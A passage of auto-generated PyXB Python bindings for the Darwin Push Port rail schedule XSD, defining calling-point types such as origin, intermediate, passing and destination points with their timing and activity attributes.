    __wtd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtd'), 'wtd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_wtd', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
    __wtd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 127, 2)
    __wtd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 127, 2)
    wtd = property(__wtd.value, __wtd.set, None, 'Working Scheduled Time of Departure')
    # Attribute fd uses Python identifier fd
    __fd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'fd'), 'fd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_fd', _ImportedBinding_darwinpush_xb_ct.TiplocType)
    __fd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 132, 2)
    __fd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 132, 2)
    fd = property(__fd.value, __fd.set, None, 'TIPLOC of False Destination to be used at this location')
    # Empty: this complex type declares no child elements.
    _ElementMap.update({
    })
    _AttributeMap.update({
        __tpl.name() : __tpl,
        __act.name() : __act,
        __planAct.name() : __planAct,
        __can.name() : __can,
        __pta.name() : __pta,
        __ptd.name() : __ptd,
        __wta.name() : __wta,
        __wtd.name() : __wtd,
        __fd.name() : __fd
    })
# Register the binding so the namespace can resolve the XSD type by name.
Namespace.addCategoryObject('typeBinding', 'OR', OR)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}OPOR with content type EMPTY
class OPOR (pyxb.binding.basis.complexTypeDefinition):
    """Defines an Operational Origin Calling Point"""
    # PyXB-generated binding: like OR but operational-only, so it carries no
    # public times (pta/ptd) or false destination.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'OPOR')
    _XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 138, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute tpl uses Python identifier tpl (required)
    __tpl = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'tpl'), 'tpl', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPOR_tpl', _ImportedBinding_darwinpush_xb_ct.TiplocType, required=True)
    __tpl._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
    __tpl._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
    tpl = property(__tpl.value, __tpl.set, None, 'TIPLOC')
    # Attribute act uses Python identifier act (default is a blank activity code)
    __act = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'act'), 'act', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPOR_act', _ImportedBinding_darwinpush_xb_ct.ActivityType, unicode_default='  ')
    __act._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
    __act._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
    act = property(__act.value, __act.set, None, 'Current Activity Codes')
    # Attribute planAct uses Python identifier planAct
    __planAct = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'planAct'), 'planAct', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPOR_planAct', _ImportedBinding_darwinpush_xb_ct.ActivityType)
    __planAct._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
    __planAct._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
    planAct = property(__planAct.value, __planAct.set, None, 'Planned Activity Codes (if different to current activities)')
    # Attribute can uses Python identifier can (defaults to false)
    __can = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'can'), 'can', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPOR_can', pyxb.binding.datatypes.boolean, unicode_default='false')
    __can._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
    __can._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
    can = property(__can.value, __can.set, None, 'Cancelled')
    # Attribute wta uses Python identifier wta
    __wta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wta'), 'wta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPOR_wta', _ImportedBinding_darwinpush_xb_ct.WTimeType)
    __wta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 143, 2)
    __wta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 143, 2)
    wta = property(__wta.value, __wta.set, None, 'Working Scheduled Time of Arrival')
    # Attribute wtd uses Python identifier wtd (required for an origin point)
    __wtd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtd'), 'wtd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPOR_wtd', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
    __wtd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 148, 2)
    __wtd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 148, 2)
    wtd = property(__wtd.value, __wtd.set, None, 'Working Scheduled Time of Departure')
    # Empty: this complex type declares no child elements.
    _ElementMap.update({
    })
    _AttributeMap.update({
        __tpl.name() : __tpl,
        __act.name() : __act,
        __planAct.name() : __planAct,
        __can.name() : __can,
        __wta.name() : __wta,
        __wtd.name() : __wtd
    })
# Register the binding so the namespace can resolve the XSD type by name.
Namespace.addCategoryObject('typeBinding', 'OPOR', OPOR)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}IP with content type EMPTY
class IP (pyxb.binding.basis.complexTypeDefinition):
    """Defines a Passenger Intermediate Calling Point"""
    # PyXB-generated binding: intermediate stop with both working times
    # required, plus an optional route-change delay (rdelay) and false
    # destination (fd).
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'IP')
    _XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 154, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute tpl uses Python identifier tpl (required)
    __tpl = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'tpl'), 'tpl', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_tpl', _ImportedBinding_darwinpush_xb_ct.TiplocType, required=True)
    __tpl._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
    __tpl._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
    tpl = property(__tpl.value, __tpl.set, None, 'TIPLOC')
    # Attribute act uses Python identifier act (default is a blank activity code)
    __act = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'act'), 'act', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_act', _ImportedBinding_darwinpush_xb_ct.ActivityType, unicode_default='  ')
    __act._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
    __act._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
    act = property(__act.value, __act.set, None, 'Current Activity Codes')
    # Attribute planAct uses Python identifier planAct
    __planAct = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'planAct'), 'planAct', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_planAct', _ImportedBinding_darwinpush_xb_ct.ActivityType)
    __planAct._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
    __planAct._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
    planAct = property(__planAct.value, __planAct.set, None, 'Planned Activity Codes (if different to current activities)')
    # Attribute can uses Python identifier can (defaults to false)
    __can = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'can'), 'can', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_can', pyxb.binding.datatypes.boolean, unicode_default='false')
    __can._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
    __can._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
    can = property(__can.value, __can.set, None, 'Cancelled')
    # Attribute pta uses Python identifier pta
    __pta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'pta'), 'pta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_pta', _ImportedBinding_darwinpush_xb_ct.RTTITimeType)
    __pta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 105, 2)
    __pta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 105, 2)
    pta = property(__pta.value, __pta.set, None, 'Public Scheduled Time of Arrival')
    # Attribute ptd uses Python identifier ptd
    __ptd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'ptd'), 'ptd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_ptd', _ImportedBinding_darwinpush_xb_ct.RTTITimeType)
    __ptd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 110, 2)
    __ptd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 110, 2)
    ptd = property(__ptd.value, __ptd.set, None, 'Public Scheduled Time of Departure')
    # Attribute wta uses Python identifier wta (required)
    __wta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wta'), 'wta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_wta', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
    __wta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 160, 2)
    __wta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 160, 2)
    wta = property(__wta.value, __wta.set, None, 'Working Scheduled Time of Arrival')
    # Attribute wtd uses Python identifier wtd (required)
    __wtd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtd'), 'wtd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_wtd', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
    __wtd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 165, 2)
    __wtd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 165, 2)
    wtd = property(__wtd.value, __wtd.set, None, 'Working Scheduled Time of Departure')
    # Attribute rdelay uses Python identifier rdelay (defaults to 0)
    __rdelay = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rdelay'), 'rdelay', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_rdelay', _ImportedBinding_darwinpush_xb_ct.DelayValueType, unicode_default='0')
    __rdelay._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 170, 2)
    __rdelay._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 170, 2)
    rdelay = property(__rdelay.value, __rdelay.set, None, "A delay value that is implied by a change to the service's route. This value has been added to the forecast lateness of the service at the previous schedule location when calculating the expected lateness of arrival at this location.")
    # Attribute fd uses Python identifier fd
    __fd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'fd'), 'fd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_fd', _ImportedBinding_darwinpush_xb_ct.TiplocType)
    __fd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 175, 2)
    __fd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 175, 2)
    fd = property(__fd.value, __fd.set, None, 'TIPLOC of False Destination to be used at this location')
    # Empty: this complex type declares no child elements.
    _ElementMap.update({
    })
    _AttributeMap.update({
        __tpl.name() : __tpl,
        __act.name() : __act,
        __planAct.name() : __planAct,
        __can.name() : __can,
        __pta.name() : __pta,
        __ptd.name() : __ptd,
        __wta.name() : __wta,
        __wtd.name() : __wtd,
        __rdelay.name() : __rdelay,
        __fd.name() : __fd
    })
# Register the binding so the namespace can resolve the XSD type by name.
Namespace.addCategoryObject('typeBinding', 'IP', IP)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}OPIP with content type EMPTY
class OPIP (pyxb.binding.basis.complexTypeDefinition):
    """Defines an Operational Intermediate Calling Point"""
    # PyXB-generated binding: like IP but operational-only, so it carries no
    # public times (pta/ptd) or false destination.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'OPIP')
    _XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 181, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute tpl uses Python identifier tpl (required)
    __tpl = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'tpl'), 'tpl', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPIP_tpl', _ImportedBinding_darwinpush_xb_ct.TiplocType, required=True)
    __tpl._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
    __tpl._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
    tpl = property(__tpl.value, __tpl.set, None, 'TIPLOC')
    # Attribute act uses Python identifier act (default is a blank activity code)
    __act = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'act'), 'act', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPIP_act', _ImportedBinding_darwinpush_xb_ct.ActivityType, unicode_default='  ')
    __act._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
    __act._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
    act = property(__act.value, __act.set, None, 'Current Activity Codes')
    # Attribute planAct uses Python identifier planAct
    __planAct = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'planAct'), 'planAct', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPIP_planAct', _ImportedBinding_darwinpush_xb_ct.ActivityType)
    __planAct._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
    __planAct._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
    planAct = property(__planAct.value, __planAct.set, None, 'Planned Activity Codes (if different to current activities)')
    # Attribute can uses Python identifier can (defaults to false)
    __can = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'can'), 'can', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPIP_can', pyxb.binding.datatypes.boolean, unicode_default='false')
    __can._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
    __can._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
    can = property(__can.value, __can.set, None, 'Cancelled')
    # Attribute wta uses Python identifier wta (required)
    __wta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wta'), 'wta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPIP_wta', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
    __wta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 186, 2)
    __wta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 186, 2)
    wta = property(__wta.value, __wta.set, None, 'Working Scheduled Time of Arrival')
    # Attribute wtd uses Python identifier wtd (required)
    __wtd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtd'), 'wtd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPIP_wtd', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
    __wtd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 191, 2)
    __wtd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 191, 2)
    wtd = property(__wtd.value, __wtd.set, None, 'Working Scheduled Time of Departure')
    # Attribute rdelay uses Python identifier rdelay (defaults to 0)
    __rdelay = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rdelay'), 'rdelay', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPIP_rdelay', _ImportedBinding_darwinpush_xb_ct.DelayValueType, unicode_default='0')
    __rdelay._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 196, 2)
    __rdelay._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 196, 2)
    rdelay = property(__rdelay.value, __rdelay.set, None, "A delay value that is implied by a change to the service's route. This value has been added to the forecast lateness of the service at the previous schedule location when calculating the expected lateness of arrival at this location.")
    # Empty: this complex type declares no child elements.
    _ElementMap.update({
    })
    _AttributeMap.update({
        __tpl.name() : __tpl,
        __act.name() : __act,
        __planAct.name() : __planAct,
        __can.name() : __can,
        __wta.name() : __wta,
        __wtd.name() : __wtd,
        __rdelay.name() : __rdelay
    })
# Register the binding so the namespace can resolve the XSD type by name.
Namespace.addCategoryObject('typeBinding', 'OPIP', OPIP)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}PP with content type EMPTY
# NOTE(review): machine-generated PyXB binding — regenerate from the XSD rather
# than hand-editing. Attribute-use objects are stored under name-mangled class
# attributes (e.g. _PP__tpl) matching the generated ids below.
class PP (pyxb.binding.basis.complexTypeDefinition):
    """Defines an Intermediate Passing Point"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'PP')
    _XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 202, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute tpl uses Python identifier tpl
    __tpl = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'tpl'), 'tpl', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_PP_tpl', _ImportedBinding_darwinpush_xb_ct.TiplocType, required=True)
    __tpl._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
    __tpl._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
    tpl = property(__tpl.value, __tpl.set, None, 'TIPLOC')
    # Attribute act uses Python identifier act
    __act = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'act'), 'act', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_PP_act', _ImportedBinding_darwinpush_xb_ct.ActivityType, unicode_default=' ')
    __act._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
    __act._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
    act = property(__act.value, __act.set, None, 'Current Activity Codes')
    # Attribute planAct uses Python identifier planAct
    __planAct = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'planAct'), 'planAct', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_PP_planAct', _ImportedBinding_darwinpush_xb_ct.ActivityType)
    __planAct._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
    __planAct._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
    planAct = property(__planAct.value, __planAct.set, None, 'Planned Activity Codes (if different to current activities)')
    # Attribute can uses Python identifier can
    __can = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'can'), 'can', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_PP_can', pyxb.binding.datatypes.boolean, unicode_default='false')
    __can._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
    __can._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
    can = property(__can.value, __can.set, None, 'Cancelled')
    # Attribute wtp uses Python identifier wtp
    __wtp = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtp'), 'wtp', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_PP_wtp', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
    __wtp._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 207, 2)
    __wtp._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 207, 2)
    wtp = property(__wtp.value, __wtp.set, None, 'Working Scheduled Time of Passing')
    # Attribute rdelay uses Python identifier rdelay
    __rdelay = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rdelay'), 'rdelay', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_PP_rdelay', _ImportedBinding_darwinpush_xb_ct.DelayValueType, unicode_default='0')
    __rdelay._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 212, 2)
    __rdelay._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 212, 2)
    rdelay = property(__rdelay.value, __rdelay.set, None, "A delay value that is implied by a change to the service's route. This value has been added to the forecast lateness of the service at the previous schedule location when calculating the expected lateness of passing this location.")
    # Empty content model: no child elements, attributes only.
    _ElementMap.update({
    })
    _AttributeMap.update({
        __tpl.name() : __tpl,
        __act.name() : __act,
        __planAct.name() : __planAct,
        __can.name() : __can,
        __wtp.name() : __wtp,
        __rdelay.name() : __rdelay
    })
# Register the binding so the namespace can resolve the 'PP' type by name.
Namespace.addCategoryObject('typeBinding', 'PP', PP)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}DT with content type EMPTY
# NOTE(review): machine-generated PyXB binding — regenerate from the XSD rather
# than hand-editing. Unlike OPDT, DT also carries the public times pta/ptd.
class DT (pyxb.binding.basis.complexTypeDefinition):
    """Defines a Passenger Destination Calling point"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'DT')
    _XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 218, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute tpl uses Python identifier tpl
    __tpl = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'tpl'), 'tpl', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_tpl', _ImportedBinding_darwinpush_xb_ct.TiplocType, required=True)
    __tpl._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
    __tpl._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
    tpl = property(__tpl.value, __tpl.set, None, 'TIPLOC')
    # Attribute act uses Python identifier act
    __act = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'act'), 'act', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_act', _ImportedBinding_darwinpush_xb_ct.ActivityType, unicode_default=' ')
    __act._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
    __act._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
    act = property(__act.value, __act.set, None, 'Current Activity Codes')
    # Attribute planAct uses Python identifier planAct
    __planAct = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'planAct'), 'planAct', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_planAct', _ImportedBinding_darwinpush_xb_ct.ActivityType)
    __planAct._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
    __planAct._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
    planAct = property(__planAct.value, __planAct.set, None, 'Planned Activity Codes (if different to current activities)')
    # Attribute can uses Python identifier can
    __can = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'can'), 'can', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_can', pyxb.binding.datatypes.boolean, unicode_default='false')
    __can._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
    __can._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
    can = property(__can.value, __can.set, None, 'Cancelled')
    # Attribute pta uses Python identifier pta
    __pta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'pta'), 'pta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_pta', _ImportedBinding_darwinpush_xb_ct.RTTITimeType)
    __pta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 105, 2)
    __pta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 105, 2)
    pta = property(__pta.value, __pta.set, None, 'Public Scheduled Time of Arrival')
    # Attribute ptd uses Python identifier ptd
